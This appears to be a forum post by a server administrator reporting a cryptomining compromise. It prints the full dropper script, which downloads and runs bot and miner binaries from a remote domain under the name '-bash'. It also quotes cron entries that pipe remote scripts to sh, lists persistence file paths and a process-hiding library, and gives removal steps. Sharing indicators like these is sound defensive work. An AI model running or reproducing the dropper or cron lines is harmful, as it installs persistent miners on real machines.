Found a script running on my server, that was hijacked and this script was left on it.

miner-malware.sh

#!/bin/sh

domain="pw.pwndns.pw"
root=$(id -u)
ARCH=$(uname -m)
if which curl > /dev/null 2>&1;	then
	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which url > /dev/null 2>&1;	then
	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which get > /dev/null 2>&1;	then
	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
elif which wget > /dev/null 2>&1;	then
	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
else
	dl=""
	read=""
fi
myip=$($read http://$domain/?ip)
servers=$($read http://$domain/servers/server.txt | grep $myip | wc -l)
if [ "$servers" = "1" ];	then
	pid=$(ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'})
	if [ -z "$pid" ];	then
		if [ "$root" = "0" ];	then
			service ssh start
			service sshd start
			/etc/init.d/sshd start
		fi
		cd /dev/shm || cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash;  $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
	# else
		# ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'} | while read -r p; do kill -9 "$p"; done
		# rm -rf /tmp/.ddr
	fi
else
	ips=$(host xmr-rx0.pwndns.pw | awk {'print $4'} | while read -r ip; do echo " -e $ip ";done)
	ips="$ips -e 185.45.192.135"
	ssips=$(ss -np | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep $ips)
	if [ -z "$ssips" ];	then
		cd /var/tmp/ || cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
	fi
fi

If anyone is seeing trends in complaints for 100% usage and if top -c and htop aren't pointing anything credible, look for this file in your server

lntpdate
lntpdate.service

some sort of mining service, that eats away all your CPU

the usual way to remove this would be

chattr -a -I /sbin/lntpdate
chattr -e /sbin/lntpdate
rm -f /sbin/lntpdate

chattr -a -I /etc/systemd/system/lntpdate.service
chattr -e /etc/systemd/system/lntpdate.service
rm -f /etc/systemd/system/lntpdate.service

found more files

check your root user crontab

• • • • • /var/tmp/.systemd/.systemd
          */5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh

The following can be on any or all user's crontabs

• • • • • /var/tmp/.systemd/.systemd
• • • • • /var/tmp/.update/.update
          */10 * * * * curl -fsSL http://pw.pwndns.pw/update.sh | sh -s uc
          @reboot curl -fsSL http://pw.pwndns.pw/reboot.sh | sh

so basically look for the following files in your entire server

lntpdate, entpdate,ntpdate, pwnrig

/etc/rc2.d/S01pwnrig
/etc/rc3.d/S01pwnrig
/etc/rc4.d/S01pwnrig
/etc/rc5.d/S01pwnrig
/etc/systemd/system/pwnrige.service
/etc/systemd/system/multi-user.target.wants/pwnrige.service
/etc/systemd/system/multi-user.target.wants/pwnrigl.service
/root/hacked/pwnrig
/usr/lib/systemd/system/pwnrigl.service

Also look for the following.

crondr mcrondr

/bin/bprofr
/sbin/-bash
/bin/-bash
/etc/cron.hourly/pwnrig
/etc/cron.hourly/ntpdate
/bin/crondr
/sbin/mcrond
/sbin/bcrond
/etc/systemd/system/pwnrige.service
/bin/sysdr
/etc/cron.daily/pwnrig
/etc/cron.daily/ntpdate
/etc/cron.monthly/pwnrig
/etc/cron.monthly/ntpdate
/etc/cron.weekly/pwnrig
/etc/cron.weekly/ntpdate
/bin/initdr
/etc/init.d/pwnrig
/sbin/minitd
/etc/init.d/ntpdate
/etc/cron.d/pwnrig
/etc/cron.d/ntpdate
/sbin/mcrond
/sbin/msysde
/sbin/msysdl
/var/tmp/.update/.x86_64

concealment used https://github.com/gianlucaborello/libprocesshider
`
root@vm:/# cat /etc/ld.so.preload

/usr/local/lib/libprocesshider.so

root@vm:/# rm -f /usr/local/lib/libprocesshider.so
`

In my case, it was caused by FRP, which exposed the port on the internet. I added a token in the config file, hope it will no longer be invaded.